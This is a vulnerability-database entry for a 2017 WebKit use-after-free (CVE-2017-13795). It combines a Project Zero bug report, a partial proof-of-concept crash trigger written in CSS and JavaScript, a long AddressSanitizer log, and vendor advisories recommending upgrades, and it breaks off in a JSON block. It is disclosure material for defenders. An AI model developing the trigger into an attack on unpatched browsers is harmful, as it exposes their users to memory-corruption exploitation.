VAR-201711-0447
Vulnerability from variot - Updated: 2025-12-22 20:55An issue was discovered in certain Apple products. iOS before 11.1 is affected. Safari before 11.0.1 is affected. iCloud before 7.1 on Windows is affected. iTunes before 12.7.1 on Windows is affected. tvOS before 11.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. WebKit: use-after-free in WebCore::AXObjectCache::performDeferredCacheUpdate
CVE-2017-13795
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.
PoC:
=================================================================
#colgrp { display: table-footer-group; } .class1 { text-transform: capitalize; display: -webkit-box; } function go() { textarea.setSelectionRange(30,1); option.defaultSelected = true; col.setAttribute("aria-labeledby", "link"); }| ================================================================= ASan log: ================================================================= ==30369==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000346940 at pc 0x000113012178 bp 0x7fff563cac80 sp 0x7fff563cac78 READ of size 8 at 0x603000346940 thread T0 ==30369==WARNING: invalid path to external symbolizer! ==30369==WARNING: Failed to use and restart external symbolizer! #0 0x113012177 in WTF::ListHashSetConstIterator >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) #1 0x112ff326d in WTF::ListHashSetIterator >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d426d) #2 0x113007cf2 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cf2) #3 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) #4 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) #5 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) #6 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) #7 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) #8 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) #9 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) #10 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) #11 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) #12 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) #13 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) #14 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) #15 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) #16 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) #17 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) #18 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) #19 0x10983356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) #20 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) 0x603000346940 is located 16 bytes inside of 24-byte region [0x603000346930,0x603000346948) freed by thread T0 here: #0 0x10ca9c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) #1 0x11ffee650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) #2 0x11300fccb in WTF::ListHashSet >::deleteAllNodes() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f0ccb) #3 0x113007edd in WTF::ListHashSet >::clear() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8edd) #4 0x113007d30 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8d30) #5 0x1139a3d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a) #6 0x1135afb10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) #7 0x1135b6542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542) #8 0x1137764b1 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9574b1) #9 0x112e437cc in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x247cc) #10 0x112e47a63 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a63) #11 0x112e47dce in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28dce) #12 0x112e40a59 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a59) #13 0x112e47eec in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28eec) #14 0x112e79f53 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5af53) #15 0x112e613eb in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x423eb) #16 0x112ff54b1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d64b1) #17 0x112ff377f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d477f) #18 0x112ff8bbd in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9bbd) #19 0x113007cea in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cea) #20 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) #21 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) #22 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) #23 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) #24 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) #25 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) #26 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) #27 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) #28 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) #29 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) previously allocated by thread T0 here: #0 0x10ca9bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) #2 0x11ffeead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) #3 0x11ffecd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) #4 0x11ff73247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) #5 0x11ff7263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) #6 0x113011c38 in WTF::ListHashSetNode::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f2c38) #7 0x113020d79 in void WTF::ListHashSetTranslator >::translate, WebCore::Node* const&, std::nullptr_t>(WTF::ListHashSetNode*&, WebCore::Node* const&&&, std::nullptr_t&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x201d79) #8 0x112ffbec9 in WTF::ListHashSet >::add(WebCore::Node* const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dcec9) #9 0x112ffb785 in WebCore::AXObjectCache::deferTextChangedIfNeeded(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dc785) #10 0x11376c58e in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d58e) #11 0x11377298d in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95398d) #12 0x1137727a1 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9537a1) #13 0x11376bf12 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cf12) #14 0x11376bd0b in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cd0b) #15 0x114443e31 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1624e31) #16 0x1144392e8 in long long WebCore::IDLOperation::call<&(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x161a2e8) #17 0x3c5768201027 () #18 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) #19 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) #20 0x11f91ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) #21 0x11f583847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) #22 0x11f50488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) #23 0x11eb1d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) #24 0x11eb1d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) #25 0x11eb1dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) #26 0x11405d615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) #27 0x1144706cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) #28 0x1137dc010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) #29 0x1137dbae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) in WTF::ListHashSetConstIterator >::operator++() Shadow bytes around the buggy address: 0x1c0600068cd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068ce0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x1c0600068cf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x1c0600068d00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068d10: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa =>0x1c0600068d20: fd fd fd fa fa fa fd fd[fd]fa fa fa 00 00 00 02 0x1c0600068d30: fa fa 00 00 00 01 fa fa 00 00 06 fa fa fa fd fd 0x1c0600068d40: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x1c0600068d50: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x1c0600068d60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x1c0600068d70: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==30369==ABORTING This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ifratric . ------------------------------------------------------------------------ WebKitGTK+ Security Advisory WSA-2017-0009 ------------------------------------------------------------------------ Date reported : November 10, 2017 Advisory ID : WSA-2017-0009 Advisory URL : https://webkitgtk.org/security/WSA-2017-0009.html CVE identifiers : CVE-2017-13783, CVE-2017-13784, CVE-2017-13785, CVE-2017-13788, CVE-2017-13791, CVE-2017-13792, CVE-2017-13793, CVE-2017-13794, CVE-2017-13795, CVE-2017-13796, CVE-2017-13798, CVE-2017-13802, CVE-2017-13803. Several vulnerabilities were discovered in WebKitGTK+. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to xisigr of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Hanul Choi working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to chenqin (ee|) of Ant-financial Light-Year Security. Description: Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html The WebKitGTK+ team, November 10, 2017 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2017-10-31-3 tvOS 11.1 tvOS 11.1 is now available and addresses the following: CoreText Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted text file may lead to an unexpected application termination Description: A denial of service issue was addressed through improved memory handling. CVE-2017-13849: Ro of SavSec Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-13799: an anonymous researcher StreamingZip Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious zip file may be able modify restricted areas of the file system Description: A path handling issue was addressed with improved validation. CVE-2017-13804: @qwertyoruiopz at KJC Research Intl. S.R.L. This was addressed with improved state management. CVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven Installation note: Apple TV will periodically check for software updates. Alternatively, you may manually check for software updates by selecting "Settings -> System -> Software Update -> Update Software." To check the current version of software, select "Settings -> General -> About." Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAln4u78pHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEYANRAA mwauLif6cLmTRZf4ENKJUA1oMP5xVnua/W8eG3Pb5/7InUls4m3chSI0uCzcGD4w Z4wVG/2ONKfHU/xjAB/IJcnBphQUsJyKyYp+mMDJHt5HJPW1gpyzdKoSmy3plFPM Pghs6v5DaG1vF9s+zqNrnBQwX0Juqwo87CBcDfg5862p5gxWocpSsLGZ0DZ9sErn eMkD/jTG9H4XYsI7T34DvDzCdFsFWGPPN6nWb9Vb0tcW4D/1WSaxJKJApXdJU6yz Fj6W7CnFOkw7SSA1qb2xl7FyVN4mzxRTRF0f8IsCQfzI7kLpNJ6rIFX0kca8FVYM ORzOLigK4eUuEeuCRV32yZuvxDF/2st3TzmFs0XKnzzd9MTIsqZogh/cv7v3MCUd FBhfEiANx86AO6OZ5VtTzqLbchm3Dws15s6G94Cmj/epuGgHYpnKnJewlpX/pVW+ QSJ+QY/q9ucjd9pnDbcutt8gfY0NCLlyjix5i0I/zAm1LhqGJJAmh1nAziiIPfzl BwI+awHCJMn9MTI56vrNsyfMIdd2X7Cux5OxEmr0sMkjAYdf3HVXA8fMb7tzukRT br+WwVWAskuJCC2PiYHcGz1x7GTzZBWXPJ6/U1K+PsUSfN/nQKdh2U3L7ivVfRWi sB8o+ec+qJeAoT41wLeCb67PgvFF//Gul8g5eh68wCI= =255g -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201712-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebKitGTK+: Multiple vulnerabilities Date: December 14, 2017 Bugs: #637076 ID: 201712-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been discovered in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.18.3 >= 2.18.3 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There are no known workarounds at this time. Resolution ========== All WebKitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.18.3" References ========== [ 1 ] CVE-2017-13783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13783 [ 2 ] CVE-2017-13784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13784 [ 3 ] CVE-2017-13785 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13785 [ 4 ] CVE-2017-13788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13788 [ 5 ] CVE-2017-13791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13791 [ 6 ] CVE-2017-13792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13792 [ 7 ] CVE-2017-13793 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13793 [ 8 ] CVE-2017-13794 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13794 [ 9 ] CVE-2017-13795 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13795 [ 10 ] CVE-2017-13796 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13796 [ 11 ] CVE-2017-13798 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13798 [ 12 ] CVE-2017-13802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13802 [ 13 ] CVE-2017-13803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13803 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201712-01 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . =========================================================================== Ubuntu Security Notice USN-3481-1 November 16, 2017 webkit2gtk vulnerabilities =========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 17.10 - Ubuntu 17.04 - Ubuntu 16.04 LTS Summary: Several security issues were fixed in WebKitGTK+. Software Description: - webkit2gtk: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 17.10: libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.17.10.1 libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.17.10.1 Ubuntu 17.04: libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.17.04.1 libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.17.04.1 Ubuntu 16.04 LTS: libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.16.04.1 libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.16.04.1 This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any applications that use WebKitGTK+, such as Epiphany, to make all the necessary changes. References: https://www.ubuntu.com/usn/usn-3481-1 CVE-2017-13783, CVE-2017-13784, CVE-2017-13785, CVE-2017-13788, CVE-2017-13791, CVE-2017-13792, CVE-2017-13793, CVE-2017-13794, CVE-2017-13795, CVE-2017-13796, CVE-2017-13798, CVE-2017-13802, CVE-2017-13803 Package Information: https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.17.10.1 https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.17.04.1 https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.16.04.1 --cAJSiv6PLl8jlntXfAr5kK8XnnPQvgKnJ-- |
|---|
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
